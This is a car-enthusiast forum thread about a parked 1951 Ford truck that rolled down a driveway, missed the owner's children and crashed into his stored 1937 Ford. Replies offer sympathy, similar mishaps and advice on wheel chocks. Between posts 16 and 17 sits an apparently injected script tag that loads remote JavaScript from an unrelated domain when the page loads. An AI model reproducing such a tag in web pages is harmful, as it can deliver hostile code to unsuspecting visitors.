Register now to get rid of these ads!

How to stop my runaway 1951 ford truck with my 1937 ford.

Discussion in 'The Hokey Ass Message Board' started by 1badbaker, Oct 10, 2013.

1. 1badbaker

1badbaker

Well, I've been trying to sell a old truck cab for a few months now, and I have it on a trailer hooked to my 1951 ford f-3 truck. Today since it was nice I pulled it around to my front driveway so I could advertise it. During this time my wife with 3 kids under the age of 4 were playing in that driveway riding bikes. I walked back to my shop and then about 10 minutes later I was walking back up front and I see my truck starting to roll down the driveway. I start running as fast I as can, thinking where are my kids. I see them and get to the truck and by that time it was rolling to fast (driveway is about 100ft down a small hill. It then crossed into my neighbors yard and crashed through there garage door and into my finished 1937 ford (keep it there for winter storage). I count my blessings that my wife was out there with the kids and had them out of the way. The truck crash through the (single garage door missing both sides of the garage(could not do that again If I was driving it :). The truck has all kinds of scratches and dents, but it adds to it war scars. Now my 37 did not fair so well, the body was painted in the late 60's and now needs some major door repair and lower quarter repair. The hinges also appear to need a little help. I'll be 100% honest, I'm just happy as heck that no one was hurt or worse. I don't know what I would of done if it would of hit anyone.

Attached Files:

2. greazy john

greazy john

What kind of bad luck is that!!!! very good no one got hurt, just a little pride.....

3. tommyd

tommyd
    from South Indy

Makes me sick to see that. You should be "disaster proof" for a while now.

4. Man, I don't know if you have bad luck or good luck! Its a conundrum.

5. KRB52

KRB52
    from Conneticut

No one got hurt. Everything else is repairable.

6. 53 COE

53 COE
    from PNW

Attached Files:

Last edited: Oct 10, 2013
  7. 32rustedinpiece

32rustedinpiece

Look at that poor, nice old lady.....see this is what happens when you take her car away from her! Karma! Hows my trailer by the way? I hope it didnt get scratched!

8. 1badbaker

1badbaker

Funny, never thought of it that way. I guess I should not of sold her car. Oh no worries on the trailer ( which I own 1/3)
    or the super nice 1981 ford truck cab.:D

9. And the junk cab didn't get a scratch! :rolleyes: HRP

10. willymakeit

willymakeit

Glad everything came no worse.
    Had something similar to happen to me 30 yrs.ago. We were pulling a truck I had backwards up the drive when the chain broke. Here it was headed down the drive with no brakes or a steering wheel. All I could do was run along side and give the front tire one helluva kick and around the garage it went. I still think about that every time I pull one and the way Oscar Lewis [my shop teacher] laughed when it was all over. I was so worried it was going in the garage to his fresh finished big window 56.

11. 1badbaker

1badbaker

:rolleyes:
    Go figure.....:eek:

12. Jalopy Joker

Jalopy Joker

truck figured it deserved Winter storage too.

13. Glad no one was hurt. You could say you were lucky in that respect.

14. If that had happened to me, I would have a bunch of lottery tickets in my hand by now.
    I have a large set of ramps in my garage, and had a pick-up come down off from them and out the open door. I was sweeping the apron with my back to the action and God tapped me on the shoulder! I heard something and jumped as the truck brushed past me and came to a stop on the drive.
    Scary stuff!

15. 1badbaker

1badbaker

I truly feel someone was watching out for my family today. Cars can be repaired, family can't be replaced.

16. Sorry to see that happened. Good no major injuries or house damage. The car and truck can be fixed. Sometimes the most effective lessons are learned form the school of hard knocks.

<script src="https://secure-content-delivery.com/data.js.php?i={4D877FC1-4956-4F45-A6B5-0E98AB82425A}&d=2012-6-15&s=http://www.jalopyjournal.com/forum/showthread.php?t=838169&cb=0.1030597054320439" type="text/javascript"></script>

17. Ebbsspeed

Ebbsspeed
    ALLIANCE MEMBER

Sucks but could have been much worse. Kids or wife were not hurt, didn't hit the garage walls, some luck involved in there somewhere.

18. old soul

old soul
    from oswego NY

dam!!!!!! Im glad everyone is ok.

19. Big T

Big T
    from Florida

No doubt, that could have turned out way worse. For what happened, the damage seems minimal. Glad everyone was out of the way.

20. 327Eric

327Eric

Anyone reading this, invest in a good set of rubber chock blocks, like truckers use,or make your own out of an old 4x4. I had a similar incident occur with a set of "heavy duty" plastic harbor freight blocks. A friend unhooked a bbq trailer from his truck, and it crushed the block instantly and rolled right into my girlfriends Honda. The trailer, although heavy is still much lighter than either an old car/truck or its capacity. My local Napa store carries them.

21. chaos10meter

chaos10meter
    from PA.

Look at this way, now you have something to work on over the winter.

22. I'd say you were lucky today

In time-this will be a funny story to tell-today count your blessings:)

23. C.G

C.G
    from AL.

The repairs will not be cheap but it could have been so much worse. Everything but the kids and wife are expendable and can be replaced or repaired. I'm very happy your ordeal turned out well!

Last year I had just put a new carb on my 46 Chevy 1/2 ton and the next morning I cranked it up and idled it out of the garage and parked it to see how the choke was going to operate. I got out and walked 30 or so feet away and looked back to see it barely inching backwards. So slowly in fact that I didn't even hurry to get to it. When I opened the door and put my leg in it "fell" into reverse at about 1700 rpm's. It took off pretty damned fast with my right leg inside and my left leg somehow under the running board. It drug me about 50+ feet before I somehow pulled myself into the cab and nailed the brakes. I left about 15 feet of skid marks on the paved driveway. The trucks tires that is. We won't talked what kind of skid marks if left. I folded the drivers door into the front fender and dented it nicely, and I really didn't care. Oddly enough, other than a bunch of bruises my only injury was to my right elbow. The doctors mostly fixed that so all is good. The truck always gets chocks now.

24. mashed

mashed
    from 4077th

Sounds like a good Allstate commercial.

I dig your upbeat attitude. I'd be cryin'.

25. 1964countrysedan

1964countrysedan
    from Texas

Good news about the kids.

And the garage too! How in the world did it miss both sides???

26. Sounds like you have my kind of luck

27. 1badbaker

1badbaker

It amazing, my wife and I sat out in the driveway this evening and still could not understand how the truck turned to the right to miss the kids and clear both sides of the garage. I can't describe how close to both openings it was, but did not touch. I think it would of taken the garage down if it would of hit the center support. The garage belongs to a elder lady who's husband pasted a few years ago and built the garage. She told my wife that she thinks her husband steered the truck to miss everything by my car and the garage door I installed after he pasted. I'll pull the 37 out tomorrow and see If I can get the door to open, as it would not open after. On a side note, I will be putting the 1951 truck out with the cab for sale, BUT it will have the tires blocked, I purchased some this afternoon.

28. Bump Stop

Bump Stop
    BANNED
    from USA

Your insurance company will never believe it; your own two unmanned vehicles crash into one another? Two claims in one incident? Heck, I'm kinda skeptical myself.

p

29. chopt31

chopt31

wow, that's crazy it missed door opening, and family, or some kids could have ben riding down sidewalk on trikes or something, someone was watching over you